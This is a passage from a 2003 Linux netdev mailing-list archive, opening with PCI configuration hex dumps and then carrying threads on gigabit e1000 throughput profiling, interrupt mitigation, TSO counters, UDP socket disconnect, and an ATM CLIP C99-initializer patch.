00 20: 00 00 00 00 00 00 00 00 00 00 00 00 43 10 e7 80 30: 00 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: fd d8 c8 f6 04 00 10 10 88 00 08 08 0c 10 10 10 60: 0f 2a 00 a0 e6 e6 95 95 41 7c 86 2f 08 6f 00 33 70: c0 88 cc 0c 0e a1 d2 00 01 b4 01 02 00 00 00 02 80: 0f 41 00 00 e0 00 00 00 03 80 f1 0f cc 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 02 c0 20 00 03 02 00 1f 00 00 00 00 6b 02 00 00 b0: 7f 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 01 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 00 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 06 11 98 85 07 00 30 22 00 00 04 06 00 00 01 00 10: 00 00 00 00 00 00 00 00 00 01 01 00 d0 d0 00 00 20: 00 fa d0 fa f0 fa f0 fb 00 00 00 00 00 00 00 00 30: 00 00 00 00 80 00 00 00 00 00 00 00 00 00 08 00 40: c8 cd 00 44 04 72 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 01 00 02 02 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) Subsystem: Asustek Computer, Inc.: Unknown device 80e7 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- TAbort- SERR- TAbort- SERR- TAbort- SERR- [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=1 PME- Capabilities: [e4] PCI-X non-bridge device. Command: DPERE- ERO+ RBC=0 OST=0 Status: Bus=0 Dev=0 Func=0 64bit- 133MHz- SCD- USC-, DC=simple, DMMRBC=2, DMOST=0, DMCRS=0, RSCEM- Capabilities: [f0] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 00: 86 80 0c 10 17 00 30 02 02 00 00 02 08 20 00 00 10: 00 00 80 f9 00 00 00 f9 01 a8 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 86 80 12 11 30: 00 00 00 00 dc 00 00 00 00 00 00 00 0a 01 ff 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 01 e4 22 c8 e0: 00 21 00 37 07 f0 02 00 00 00 40 00 00 00 00 00 f0: 05 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00:09.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: b7 10 55 90 17 00 10 02 30 00 00 02 08 20 00 00 10: 01 a4 00 00 00 00 80 f8 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 b7 10 55 90 30: 00 00 00 00 dc 00 00 00 00 00 00 00 07 01 0a 0a 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 f6 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:0a.0 FireWire (IEEE 1394): Texas Instruments TSB12LV23 IEEE-1394 Controller (prog-if 10 [OHCI]) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- TAbort- SERR- 00: 02 10 42 47 87 00 90 02 5c 00 00 03 08 40 00 00 10: 08 00 00 fb 01 d8 00 00 00 00 00 fa 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 02 10 80 00 30: 00 00 fe fa 50 00 00 00 00 00 00 00 ff 00 08 00 40: 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 02 00 10 00 03 02 00 ff 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 From haveblue@us.ibm.com Wed Jul 2 17:56:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 17:56:45 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h630uR2x013011 for ; Wed, 2 Jul 2003 17:56:34 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h630uKXq147674; Wed, 2 Jul 2003 20:56:20 -0400 Received: from DYN318089.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h630uIqO253254; Wed, 2 Jul 2003 20:56:18 -0400 Subject: impressive throughput on 2.5.73 From: Dave Hansen To: netdev@oss.sgi.com Cc: Scott Feldman , Nivedita Singhvi Content-Type: text/plain Organization: Message-Id: <1057193766.31286.843.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 17:56:07 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3731 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev I run a little script to load up a gigabit ethernet link between two of my machines: an 8-way PIII web server, and a 4-way PIII client. Both client and server have e1000s. The script fetches a bunch of fairly big files via http from the server, using apache. I'm impressed that it can fill just about the entire gigabit pipe, while using less than 1 of the server's CPUs. 176 requests/sec - 110.0 MB/second - 0.6 MB/request Server CPU breakdown. 2% system 7% user 91% idle I'm not using any interrupt mitigation, so I'm still at ~9k interrupts/sec. I'll try NAPI next. server profile: 197212 total 0.1159 175783 poll_idle 2441.4306 1474 alloc_skb 6.8241 1281 skb_release_data 8.6554 1202 skb_clone 3.7563 1038 do_tcp_sendpages 0.3655 998 e1000_clean_tx_irq 2.1886 974 e1000_xmit_frame 0.5148 841 tcp_transmit_skb 0.5729 827 Letext 2.0675 791 __kmalloc 6.3790 739 ip_queue_xmit 0.6415 629 ip_finish_output 1.4976 583 tcp_write_xmit 0.7836 571 tcp_v4_rcv 0.2896 422 schedule 0.2733 417 e1000_intr 3.7232 403 tcp_clean_rtx_queue 0.5140 399 __kfree_skb 2.1685 353 kfree 3.6771 337 kmem_cache_free 4.4342 309 e1000_clean_rx_irq 0.3053 291 find_get_page 6.0625 284 do_softirq 1.4200 246 eth_type_trans 1.4643 233 dev_queue_xmit 0.4380 226 __wake_up 5.1364 216 ip_rcv 0.2093 202 sock_wfree 3.3667 202 memcpy 5.0500 client profile: 33363 total 0.0196 9575 poll_idle 132.9861 5099 __copy_user_intel 32.6859 3307 schedule 2.1418 1753 __wake_up 39.8409 667 tcp_v4_rcv 0.3382 577 pipe_write 0.7970 510 __down_wq 1.7708 488 alloc_skb 2.2593 476 tcp_recvmsg 0.2216 457 tcp_rcv_established 0.2746 457 __kfree_skb 2.4837 405 dnotify_parent 4.5000 382 pipe_read 0.7290 368 system_call 8.3636 350 kill_fasync 7.0000 341 current_kernel_time 5.0147 299 __kmalloc 2.4113 280 ip_rcv 0.2713 252 eth_type_trans 1.5000 245 skb_release_data 1.6554 233 ip_queue_xmit 0.2023 232 kfree 2.4167 228 e1000_clean_rx_irq 0.2253 210 pipe_wait 1.3816 205 e1000_clean_tx_irq 0.4496 200 tcp_transmit_skb 0.1362 199 e1000_xmit_frame 0.1052 -- Dave Hansen haveblue@us.ibm.com From niv@us.ibm.com Wed Jul 2 20:01:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:01:46 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6331a2x014325 for ; Wed, 2 Jul 2003 20:01:42 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6331R8w246212; Wed, 2 Jul 2003 23:01:28 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6331QsH179690; Wed, 2 Jul 2003 21:01:27 -0600 Message-ID: <3F039BE1.2080008@us.ibm.com> Date: Wed, 02 Jul 2003 19:58:41 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Dave Hansen CC: netdev@oss.sgi.com, Scott Feldman Subject: Re: impressive throughput on 2.5.73 References: <1057193766.31286.843.camel@nighthawk> In-Reply-To: <1057193766.31286.843.camel@nighthawk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3733 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Dave Hansen wrote: > 176 requests/sec - 110.0 MB/second - 0.6 MB/request > > Server CPU breakdown. > 2% system > 7% user > 91% idle > > client profile: > 33363 total 0.0196 > 9575 poll_idle 132.9861 > 5099 __copy_user_intel 32.6859 > 3307 schedule 2.1418 > 1753 __wake_up 39.8409 > 667 tcp_v4_rcv 0.3382 Nice numbers :). In addition to NAPI, would be nice to stick in more adapters. Any idea why __wake_up should be so expensive on the client side? thanks, Nivedita From haveblue@us.ibm.com Wed Jul 2 20:21:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:21:22 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h633LB2x016492 for ; Wed, 2 Jul 2003 20:21:18 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h633L4Xq143078; Wed, 2 Jul 2003 23:21:04 -0400 Received: from nighthawk.sr71.net (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h633L241074244; Wed, 2 Jul 2003 23:21:03 -0400 Subject: Re: impressive throughput on 2.5.73 From: Dave Hansen To: Nivedita Singhvi Cc: netdev@oss.sgi.com, Scott Feldman In-Reply-To: <3F039BE1.2080008@us.ibm.com> References: <1057193766.31286.843.camel@nighthawk> <3F039BE1.2080008@us.ibm.com> Content-Type: text/plain Organization: Message-Id: <1057202451.2916.36.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 20:20:52 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3734 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 19:58, Nivedita Singhvi wrote: > Nice numbers :). In addition to NAPI, would be nice to > stick in more adapters. Any idea why __wake_up should be > so expensive on the client side? NAPI seems to degrade throughput down to ~80MB/sec, but the interrupt rate doesn't change. I'm going to put some debugging in and makes sure that it's kicking in properly. -- Dave Hansen haveblue@us.ibm.com From shibu_lkml@yahoo.com Wed Jul 2 20:16:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 20:27:14 -0700 (PDT) Received: from web20704.mail.yahoo.com (web20704.mail.yahoo.com [216.136.226.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h633GA2x016453 for ; Wed, 2 Jul 2003 20:16:11 -0700 Message-ID: <20030703031610.79050.qmail@web20704.mail.yahoo.com> Received: from [202.54.26.201] by web20704.mail.yahoo.com via HTTP; Wed, 02 Jul 2003 20:16:10 PDT Date: Wed, 2 Jul 2003 20:16:10 -0700 (PDT) From: Shibu LKML Subject: Disconnecting a connected UDP socket To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-572335396-1057202170=:79043" X-archive-position: 3735 X-Approved-By: ralf@linux-mips.org X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shibu_lkml@yahoo.com Precedence: bulk X-list: netdev --0-572335396-1057202170=:79043 Content-Type: text/plain; charset=us-ascii Hi, I am wondering if Linux supports disconnecting a connected UDP socket. The manpage for connect lists it in the BUGS section. It says disconnect is still not supported. I was wondering if it involves more than adding the following lines to udp_connect in udp.c if (usin->sin_family == AF_UNSPEC) return udp_disconnect(sk, 0); (just above sk_dst_reset(sk)) Will this fix the problem for IPV4 stuff? Regards Shibu --------------------------------- Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! --0-572335396-1057202170=:79043 Content-Type: text/html; charset=us-ascii
Hi,
 
I am wondering if Linux supports disconnecting a connected UDP socket. The manpage for connect lists it in the BUGS section. It says disconnect is still not supported. I was wondering if it involves more than adding the following lines to udp_connect in udp.c
 
if (usin->sin_family == AF_UNSPEC)
  return udp_disconnect(sk, 0);
(just  above sk_dst_reset(sk))
 
Will this fix the problem for IPV4 stuff?
 
 
Regards
Shibu
 


Do you Yahoo!?
SBC Yahoo! DSL - Now only $29.95 per month! --0-572335396-1057202170=:79043-- From haveblue@us.ibm.com Wed Jul 2 21:50:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 21:50:50 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h634of2x017532 for ; Wed, 2 Jul 2003 21:50:41 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h634oYDG174726; Thu, 3 Jul 2003 00:50:34 -0400 Received: from nighthawk.sr71.net (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h634oYl4116652; Wed, 2 Jul 2003 22:50:34 -0600 Subject: RE: impressive throughput on 2.5.73 From: Dave Hansen To: Scott Feldman Cc: netdev@oss.sgi.com, Nivedita Singhvi In-Reply-To: References: Content-Type: text/plain Organization: Message-Id: <1057207823.2916.87.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 21:50:23 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3737 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 21:41, Feldman, Scott wrote: > How many TSO per/second are you doing? > > # watch "ethtool -S ethX | grep tx_tcp_seg" Hmmm. My ethtool doesn't have a "-S", only "-s". Is is too ancient? -- Dave Hansen haveblue@us.ibm.com From haveblue@us.ibm.com Wed Jul 2 21:59:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 21:59:13 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h634x82x017763 for ; Wed, 2 Jul 2003 21:59:09 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h634x2Ys225030; Thu, 3 Jul 2003 00:59:02 -0400 Received: from nighthawk.sr71.net (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h634wxqO257098; Thu, 3 Jul 2003 00:59:00 -0400 Subject: RE: impressive throughput on 2.5.73 From: Dave Hansen To: Scott Feldman Cc: netdev@oss.sgi.com, Nivedita Singhvi In-Reply-To: References: Content-Type: text/plain Organization: Message-Id: <1057208329.2957.96.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 21:58:49 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3738 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 21:41, Feldman, Scott wrote: > > server, using apache. I'm impressed that it can fill just > > about the entire gigabit pipe, while using less than 1 of the > > server's CPUs. > > 1 PIII CPU per 1GbE interface is a good rule of thumb. A 10GbE > interface would consume your 8-way, right? Sounds right :) > How many TSO per/second are you doing? > > # watch "ethtool -S ethX | grep tx_tcp_seg" ethtool 1.6 fixed my -S problem ~3500, apparently tx_tcp_seg_good: 401212 tx_tcp_seg_failed: 0 -- Dave Hansen haveblue@us.ibm.com From zwane@arm.linux.org.uk Wed Jul 2 22:51:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 22:51:46 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h635pZ2x019268 for ; Wed, 2 Jul 2003 22:51:37 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.203.207.204]) by hemi.commfireservices.com (Postfix) with ESMTP id 68AADBC51; Thu, 3 Jul 2003 01:41:20 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h635eLvo007264; Thu, 3 Jul 2003 01:40:21 -0400 Date: Thu, 3 Jul 2003 01:40:21 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: "Feldman, Scott" Cc: Dave Hansen , netdev@oss.sgi.com, Nivedita Singhvi Subject: RE: impressive throughput on 2.5.73 In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3740 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev On Wed, 2 Jul 2003, Feldman, Scott wrote: > Interrupt mitigation must be on if you're only getting 9K intr/sec. If > you where getting one interrupt per packet, you'd see an order of > magnitude higher intr/sec rate. What about the e1000 hw interrupt mitigation, isn't the interrupt throttle on by default? Zwane -- function.linuxpower.ca From yoshfuji@linux-ipv6.org Thu Jul 3 02:38:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 02:38:51 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h639ch2x024187 for ; Thu, 3 Jul 2003 02:38:44 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h639cpBo009420; Thu, 3 Jul 2003 18:38:52 +0900 Date: Thu, 03 Jul 2003 18:38:50 +0900 (JST) Message-Id: <20030703.183850.78164037.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au, chas@cmf.nrl.navy.mil CC: netdev@oss.sgi.com, linux-atm-general@lists.sourceforge.net, yoshfuji@linux-ipv6.org Subject: [PATCH] ATM: CLIP: C99 initializers From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3743 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. This converts nlip_tbl to C99 initializers. (and fixes wrong value for proxy_len and locktime.) Thanks. Index: linux-2.5/net/atm/clip.c =================================================================== RCS file: /home/cvs/linux-2.5/net/atm/clip.c,v retrieving revision 1.17 diff -u -r1.17 clip.c --- linux-2.5/net/atm/clip.c 23 Jun 2003 22:08:56 -0000 1.17 +++ linux-2.5/net/atm/clip.c 3 Jul 2003 08:17:44 -0000 @@ -327,40 +327,34 @@ return hash_val; } - static struct neigh_table clip_tbl = { - NULL, /* next */ - AF_INET, /* family */ - sizeof(struct neighbour)+sizeof(struct atmarp_entry), /* entry_size */ - 4, /* key_len */ - clip_hash, - clip_constructor, /* constructor */ - NULL, /* pconstructor */ - NULL, /* pdestructor */ - NULL, /* proxy_redo */ - "clip_arp_cache", - { /* neigh_parms */ - NULL, /* next */ - NULL, /* neigh_setup */ - &clip_tbl, /* tbl */ - 0, /* entries */ - NULL, /* priv */ - NULL, /* sysctl_table */ - 30*HZ, /* base_reachable_time */ - 1*HZ, /* retrans_time */ - 60*HZ, /* gc_staletime */ - 30*HZ, /* reachable_time */ - 5*HZ, /* delay_probe_time */ - 3, /* queue_len */ - 3, /* ucast_probes */ - 0, /* app_probes */ - 3, /* mcast_probes */ - 1*HZ, /* anycast_delay */ - (8*HZ)/10, /* proxy_delay */ - 1*HZ, /* proxy_qlen */ - 64 /* locktime */ + .family = AF_INET, + .entry_size = sizeof(struct neighbour)+sizeof(struct atmarp_entry), + .key_len = 4, + .hash = clip_hash, + .constructor = clip_constructor, + .id = "clip_arp_cache", + + /* parameters are copied from ARP ... */ + .parms = { + .tbl = &clip_tbl, + .base_reachable_time = 30 * HZ, + .retrans_time = 1 * HZ, + .gc_staletime = 60 * HZ, + .reachable_time = 30 * HZ, + .delay_probe_time = 5 * HZ, + .queue_len = 3, + .ucast_probes = 3, + .mcast_probes = 3, + .anycast_delay = 1 * HZ, + .proxy_delay = (8 * HZ) / 10, + .proxy_qlen = 64, + .locktime = 1 * HZ, }, - 30*HZ,128,512,1024 /* copied from ARP ... */ + .gc_interval = 30 * HZ, + .gc_thresh1 = 128, + .gc_thresh2 = 512, + .gc_thresh3 = 1024, }; -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From jmorris@intercode.com.au Thu Jul 3 04:14:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 04:14:17 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:Zdb8oZtOJR7QKm2UDpQnqzfsE8lpvVJb@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63BDs2x026968 for ; Thu, 3 Jul 2003 04:13:56 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h63ADpr18579; Thu, 3 Jul 2003 20:13:51 +1000 Date: Thu, 3 Jul 2003 20:13:51 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , , Subject: Re: [PATCH] NET: fix SEGV/OOPS with /proc/net/{raw,igmp,...} (is Re: [Bug 863] New: cat /proc/buddyinfo + netstat -a kills machine) In-Reply-To: <20030703.154429.06241047.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3744 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 3 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > I'm not so sure if this is ralated to BUG#863, but anyway; > > Following patch fixes segv/oops with /proc/net/{raw,igmp,mfilter, > raw6,igmp6,mfilter6,anycast,ip6_flowlabel}. Applied to bk://kernel.bkbits.net/jmorris/net-2.5 - James -- James Morris From mcr@sandelman.ottawa.on.ca Thu Jul 3 09:35:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 09:35:15 -0700 (PDT) Received: from noxmail.sandelman.ottawa.on.ca (cyphermail.sandelman.ottawa.on.ca [192.139.46.78]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63GYs2x006599 for ; Thu, 3 Jul 2003 09:35:04 -0700 Received: from lox.sandelman.ottawa.on.ca (IDENT:root@lox.sandelman.ottawa.on.ca [192.139.46.2]) by noxmail.sandelman.ottawa.on.ca (8.11.6p2/8.11.6) with ESMTP id h63GYcw18729 (using TLSv1/SSLv3 with cipher EDH-RSA-DES-CBC3-SHA (168 bits) verified NO) for ; Thu, 3 Jul 2003 12:34:40 